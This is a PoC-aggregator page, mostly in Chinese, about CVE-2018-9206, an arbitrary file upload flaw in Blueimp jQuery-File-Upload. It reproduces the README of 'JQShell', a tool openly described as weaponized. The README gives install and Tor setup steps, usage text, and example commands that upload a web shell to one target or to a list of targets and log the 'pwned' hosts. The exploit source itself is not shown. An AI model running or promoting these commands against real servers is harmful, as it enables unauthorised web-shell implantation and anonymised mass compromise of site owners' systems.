POC详情: 4ea09de0beffb22cf235084f38e14936b34e5e59

来源
https://github.com/Stahlz/JQShell
关联漏洞
标题: Blueimp jQuery-File-Upload 安全漏洞 (CVE-2018-9206)
描述:Blueimp jQuery-File-Upload是一款支持多种语言的文件上传工具,它包括文件选择、文件拖放、进度条显示和图像预览等功能。 Blueimp jQuery-File-Upload 9.22.0及之前版本中存在任意文件上传漏洞。远程攻击者可利用该漏洞执行代码。
描述
A weaponized version of CVE-2018-9206
介绍
![alt text](https://i.imgur.com/Gp4QkiN.png)

**JQShell** 

A weaponized version of CVE-2018-9206.

**Disclaimer**

Using this agianst servers you dont control, is illegal in most countries.
The author claims no responsibility for the actions of those who use this software for illegal purposes.
This software is intended for educational use only.
No servers were illegally pwned in the making of this software.

**Features**

*Single Target*
*Multi Target*
*Tor*

**Prerequisites**

Please install these required packages.

**Python3**

```shell
pip3 install requests pysocks subprocess stem
```
**Tor Control Port**

To use tor, in this script, you must edit your torrc file and enable tor control port on 9051.

Typically this file is here: /etc/tor/torrc

open this file and change this line:

```shell
#ControlPort 9051
```

to

```shell
ControlPort 9051
```

```shell
restart tor service
```

**Usage**

```shell
usage: jqshell.py [-h] [-l LIST_INIT] [-t SINGLE_TARGET] -s SHELL_LOC
                  [-o OUTPUTZ] [-tor]

optional arguments:
  -h, --help            show this help message and exit
  -l LIST_INIT, --list LIST_INIT
                        Select for a list of assets to exploit
  -t SINGLE_TARGET, --target SINGLE_TARGET
                        Single exploit target
  -s SHELL_LOC, --shell SHELL_LOC
                        This is required, put the fullpath to your shell
  -o OUTPUTZ, --output OUTPUTZ
                        This is full path to were you want to save your list
                        of confirmed hosts
  -tor, --tor_proxy     Select if you have tor installed, you will need to
                        enable control port
```
**Examples**

Running agianst single target.
```shell
python3 jqshell.py -t http://localhost/folderwerejqueryis -s /var/www/html/shell.php
```
Running agianst single target, with saving output.
```shell
python3 jqshell.py -t https://localhost/folderwerejqueryis -s /var/www/html/shell.php -o pwned.txt
```
Running a list, with saving output.
```shell
python3 jqshell.py -l /opt/jquery/test.txt -s /var/www/html/shell.php -o pwned.txt
```
**Author**

* **Joshua Whitaker** 
* *Twitter* [@_Stahlz](https://twitter.com/_Stahlz)
* *Email* - [stahl@stahl.io](stahl@stahl.io)
* *Website* - [stahl.io](http://stahl.io)
文件快照

 [4.0K]  /data/pocs/4ea09de0beffb22cf235084f38e14936b34e5e59
├── [8.1K]  jqshell.py
├── [4.5K]  misc.py
├── [4.0K]  __pycache__
│   └── [4.8K]  misc.cpython-36.pyc
└── [2.2K]  README.md

1 directory, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。